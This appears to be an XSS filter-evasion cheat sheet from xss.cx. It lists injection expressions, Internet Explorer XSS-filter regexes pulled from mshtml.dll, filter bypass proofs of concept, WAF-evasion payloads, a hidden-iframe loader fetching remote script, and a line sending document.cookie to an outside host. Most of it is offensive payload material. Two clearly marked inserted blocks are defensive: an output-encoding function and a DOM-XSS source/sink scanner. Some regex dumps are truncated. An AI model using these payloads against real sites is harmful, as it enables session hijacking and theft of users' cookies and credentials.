MSHTML.DLL, IE XSS Filter, WebKit XSSAdmin Filter, Evasion, Resource, Proof of Concept, Example, DOM, DORK, Cross Site Scripting, Links, Credits

Bypass XSS Neutering in User-Agents
Cumulative URL for Evasion Techniques

This post is updated frequently - Last updated 05/21/2013 @ 1230 GMT

Abstract: Modern User-Agents are exploited by well-crafted URLs that execute outside the defense coverage envelope of XSS neutering routines.

Definition of XSS (Ferruh Mavituna): Cross-site Scripting (CWE-79, CAPEC-86) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. XSS allows for hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

==============
XSS Expressions
==============
Key: each row gives the JavaScript operator and the injection reflection that uses it to break out of a quoted string and call prompt(9).
==============
Operator                                      Injection Reflection
Addition & String Concatenation               "%2bprompt(9)%2b"
Subtraction                                   "-prompt(9)-"
Multiplication                                "*prompt(9)*"
Division                                      "/prompt(9)/"
Modulus (%25 needs to reflect as %)           "%25prompt(9)%25"
“Less Than” Comparison                        "<prompt(9)<"
“Greater Than” Comparison                     ">prompt(9)>"
“Less Than or Equal To” Comparison            "<=prompt(9)<="
“Greater Than or Equal To” Comparison         ">=prompt(9)>="
“Equal To” Comparison                         "==prompt(9)=="
Strong-Typed “Equal To” Comparison            "===prompt(9)==="
“Not Equal To” Comparison                     "!=prompt(9)!="
Logical “and” (%26 needs to reflect as &)     "%26%26prompt(9)%26%26"
Logical “or”                                  "||prompt(9)||"
Bitwise “and”                                 "%26prompt(9)%26"
Bitwise “or”                                  "|prompt(9)|"
Bitwise “xor”                                 "^prompt(9)^"
Bitwise Left Shift                            "<<prompt(9)<<"
Bitwise Right Shift                           ">>prompt(9)>>"
Bitwise Right Shift With Zeros                ">>>prompt(9)>>>"
Ternary Conditional Expression                "?prompt(9):"

======================================================
Extract XSS Filters from MSHTML.DLL used in IE9
======================================================
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
======================================================
Updated: May 21, 2013 - Added IE10 regexp
======================================================
IE9 Summary - 23 Hardcoded Regex in mshtml.dll
======================================================
Fixed strings (2):    javascript:, vbscript:
HTML tags (14):       object, applet, base, link, meta, import, embed, vmlframe, iframe, script (2), style, isindex, form
HTML attributes (3):  " datasrc, " style=, " on*= (event handlers)
JavaScript strings (4): ";location=, ";a.b=, ");a(, ";a(b)
======================================================
IE XSS REGEX RESULTS (As of 09/2011) for IE9
======================================================
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).} {(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).} {.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))} {]} {} {} {[\"\'][ ]*(([^a-z0-9~_:\'\" 
])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} ====================================================== IE XSS REGEX RESULTS (As of 05/2013) for IE10 ====================================================== {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} {[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\ {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {]} {.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))} {(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|( 
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13) {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065) {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {} {<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=} {<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=} {} {]} {]} {<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=} <=: {} { {} <>:(=&#@ 
{(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} :(=# {.*?((@[i\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))))} :& {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&#x?0*((66)|(42)|(98)|(62));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {] ====================================================== XSS URL Overview - IE9 XSS Filter Neutering Example - Craft a URL 
======================================================
HTTP GET http://victim.fqdn/?xss=
============================================
IE9 Filters to Neuter =
============================================
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=}
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=}
=============================================================
IE9 Filter Bypass PoC #1
=============================================================
Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?=
Bypass Expression = "+{valueOf:location, toString: [].join,0:'jav\x61script:alert\x280)',length:1}//
location("http://xss.cx/");
=============================================================
IE9 Filter Bypass PoC #2
=============================================================
Regex = {[\\\"\\'][ ]*(([^a-z~_:\\'\\\" 0-9])|(in)).+?{\\(}.*?{\\)}}
Bypass Expression = foo='&js_xss=";alert(0)//
Bypass Expression = ",alert(0)//
Bypass Expression = foo=
=============================================================
IE9 Filter Bypass PoC #3
=============================================================
Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(({[.]}.+?)|({[\[]}.*?{[\]]}.*?))=
Bypass Expression = ";x:[document.URL='jav\x61script:alert\x280)']//
Bypass Expression = ”>link
=============================================================
WebKit XSSAdmin Filter Bypass #1
=============================================================
"> "-prompt(document.location)-"
=============================================================
Universal XSS Filter Bypass #1
=============================================================
Expect:
Referer: http://www.google.com/search?hl=en&q=xss">
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)xss">
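The three IE9 PoCs above, the WebKit and "universal" header-reflection bypasses, and the operator table at the top of this page all share one root cause: a request value lands inside a JavaScript string literal and is able to close the quote around it. Browser-side filters and WAF blocklists only sit in front of that bug; the fix that makes the whole table inert is encoding the value for the string context at the point where the server emits it. The following is an added example written for this page, not code from xss.cx: every character outside [A-Za-z0-9] becomes a \xHH or \uHHHH escape before the value is placed in the script. The function names (encodeForJsString, buildScriptRaw, buildScriptEncoded, evaluateTemplate), the hook() stand-in for prompt(9)/alert(0), and the two payloads are assumptions constructed for the demonstration.

```javascript
// Added example (not code from xss.cx): output encoding for the JavaScript
// string context, the context that every "<op>prompt(9)<op>" expression in
// the table above and the IE9 PoCs target. Function names are hypothetical.

// Emit every character outside [A-Za-z0-9] as a \xHH (or \uHHHH / \u{H...})
// escape. The value can then never close the surrounding quote, never form
// an operator, and never contain "</script>" to end the inline block.
function encodeForJsString(value) {
  let out = "";
  for (const ch of String(value)) {        // iterates by code point
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
    } else if (cp <= 0xff) {
      out += "\\x" + cp.toString(16).padStart(2, "0");
    } else if (cp <= 0xffff) {
      out += "\\u" + cp.toString(16).padStart(4, "0");
    } else {
      out += "\\u{" + cp.toString(16) + "}";
    }
  }
  return out;
}

// "Before": the request parameter is concatenated straight into an inline
// script. This is the bug the PoCs above rely on.
function buildScriptRaw(param) {
  return 'var xss = "' + param + '";';
}

// "After": the same template, with the value encoded for the string context.
function buildScriptEncoded(param) {
  return 'var xss = "' + encodeForJsString(param) + '";';
}

// Demo harness only: run the generated statement in its own function scope.
// hook() stands in for the prompt(9)/alert(0) calls from the page so the run
// is self-contained; `fired` records whether the injected call executed and
// `xss` is the value the script ended up holding.
function evaluateTemplate(script) {
  let fired = false;
  const hook = () => { fired = true; return ""; };
  const xss = new Function("hook", script + "\nreturn xss;")(hook);
  return { fired, xss };
}

// Constructed payloads: the "+...+" concatenation form from the table and the
// ";...// form from PoC #2, with hook() in place of prompt/alert.
const PAYLOADS = ['"+hook()+"', '";hook()//'];

for (const p of PAYLOADS) {
  console.log(JSON.stringify(p),
    "raw ->", evaluateTemplate(buildScriptRaw(p)),
    "encoded ->", evaluateTemplate(buildScriptEncoded(p)));
}
```

With the raw template both payloads fire the hook; with the encoded template nothing executes and `xss` holds the original input byte for byte, so the application still gets the value it wanted. Because `<`, `/` and `>` are escaped as well, a value containing `</script>` cannot terminate the inline block either, which a blocklist of function names (the thing the "WAF Evasion 101" section below shows being stepped around) never addresses.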
=============================================================
XSS.CX Low Hanging Fruit Examples, PoC, XSS, Expression, DOM, DORK
=============================================================
Array = (function(orig){ var f = function() { alert('DOH'); return orig.apply(this, arguments); }; f.prototype = orig.prototype; return f; })(Array);
------------------------------------------------
eval(unescape(location.href))
------------------------------------------------
onreadystatechange=eval(unescape(location.href))
------------------------------------------------
?name=xss#
------------------------------------------------
document.write("XSS");
------------------------------------------------
#%0Afunction%20DOH%28%29{alert%28%27DOH%27%29%3B} DOH();
=============================================================
Example FrameBuster JS - From bankofamerica.com
=============================================================
if (self == top) {
  var theBody = document.getElementsByTagName('body')[0];
  theBody.style.display = "block";
} else {
  top.location = self.location;
}
=============================================================
XSS Exploit PoC - iFramer
=============================================================
if (document.getElementsByTagName('body')[0]) {
  iframer();
} else {
  document.write("");
}
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://xss.cx/xss.js');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}
=============================================================
WAF Evasion 101, 102, 103, 104, 105, 106
=============================================================
Don't use alert(1), try:
prompt(9)
prompt(0x0064)
prompt(location.hash)
alert(location.hostname)
window.location.assign("http://xss.cx")
document.location="http://xss.cx/default.aspx?c=" + document.cookie
=============================================================
Some Examples (These are from the URLs listed below)
=============================================================
http://somesite/test.asp?param=
click to continue
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//
"+document.cookie+"
- Conducting variable assignments to sensitive data, e.g. ";user_input=document.cookie;// or ";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. ";escape=eval;// (Note though that you can't seem to assign to some functions, e.g. alert=eval doesn't seem to work)
=============================================================
Suggested Reading
=============================================================
http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf
http://www.collinjackson.com/research/xssauditor.pdf
https://www.owasp.org/index.php/DOM_Based_XSS
https://code.google.com/p/domxsswiki/wiki/Index
http://www.webappsec.org/projects/articles/071105.shtml
http://code.google.com/p/urlparsing/
http://kotowicz.net/absolute/
=============================================================
DOM-based XSS - Sources and Sinks - (Mario Heiderich)
=============================================================
Find Sources:
/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/
=============================================================
Find Sinks:
/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/
============================================================
Credits
============================================================
Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna, Mark Flores Martin, many others...
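The two expressions in the "Sources and Sinks" section above are meant to be run over client-side code during review. As an added example (not part of this page and not Mario Heiderich's own tooling), the block below turns them into a small triage scanner: it reports every source and sink hit with its line number and then lists the lines where a source and a sink coincide, which is the eval(unescape(location.href)) pattern from the "Low Hanging Fruit" section. The function names (scanForDomXss, sameLineFlows) and the seven-line sample snippet are constructed for this example; the two regular expressions are copied from the page with only the global flag added.

```javascript
// Added example (not from xss.cx): run the page's "Find Sources" and
// "Find Sinks" expressions over JavaScript source, line by line, to build a
// review worklist. Names and the sample snippet are constructed here.

// The two expressions as given on the page, with /g added so that every
// occurrence on a line is reported rather than only the first.
const SOURCE_RE = /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/g;
const SINK_RE = /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/g;

// Returns { sources: [{line, match}], sinks: [{line, match}] } for `source`.
// Note that the page's source expression also lists innerHTML and write(),
// which are DOM write points; treat those hits as sinks when reviewing.
function scanForDomXss(source) {
  const sources = [];
  const sinks = [];
  source.split(/\r?\n/).forEach((text, idx) => {
    const line = idx + 1;
    for (const m of text.matchAll(SOURCE_RE)) {
      sources.push({ line, match: m[0].trim() });
    }
    for (const m of text.matchAll(SINK_RE)) {
      sinks.push({ line, match: m[0].trim() });
    }
  });
  return { sources, sinks };
}

// Lines on which a source feeds a sink directly are the first thing to read.
// This only pairs hits that share a line; flows through variables still need
// a human (or a taint tracker) to follow.
function sameLineFlows(result) {
  const sinkLines = new Set(result.sinks.map((s) => s.line));
  return [...new Set(result.sources
    .filter((s) => sinkLines.has(s.line))
    .map((s) => s.line))];
}

// Constructed sample: a fragment in the style of the "Low Hanging Fruit"
// section, plus one safe line (createTextNode) that should not be flagged.
const SAMPLE_SOURCE = [
  "var q = location.hash.slice(1);",              // 1: source (location.)
  "var out = document.getElementById('out');",    // 2: nothing
  "out.innerHTML = q;",                           // 3: write point (.innerHTML)
  "eval(unescape(location.href));",               // 4: source and sink on one line
  "setTimeout(q, 10);",                           // 5: sink (setTimeout()
  "document.write(q);",                           // 6: write point (.write()
  "var safe = document.createTextNode(q);",       // 7: nothing
].join("\n");

// Stand-alone run: print the worklist for the sample.
const report = scanForDomXss(SAMPLE_SOURCE);
console.log("sources:", report.sources);
console.log("sinks:", report.sinks);
console.log("same-line source->sink:", sameLineFlows(report));
```

On the sample this reports sources on lines 1, 3, 4 and 6, sinks on lines 4 and 5, and line 4 as the one direct flow. The grep is deliberately loose (it matches identifiers, not data flow), so its output is a list of places to read rather than a verdict; the createTextNode line on 7 is correctly absent because the write goes through a text node rather than any of the listed sinks.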
=============================================================
Keywords: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer
=============================================================
XSS.Cx Resources
=============================================================
xss.cx/examples/data/xss-cross-site-scripting-expressions-example-cwe79-capec86-javascript-injection-example-poc-filter-evasion-techniques.txt
http://xss.cx/examples/ie/internet-exploror-ie9-xss-filter-rules-example-regexp-mshtmldll.txt
alert(location.hash)
alert(location.host)
alert(location.hostname)
alert(location.pathname)
alert(location.port)
alert(location.protocol)
alert(location.search)
window.location.assign("http://xss.cx")
document.location="http://xss.cx/default.aspx?c=" + document.cookie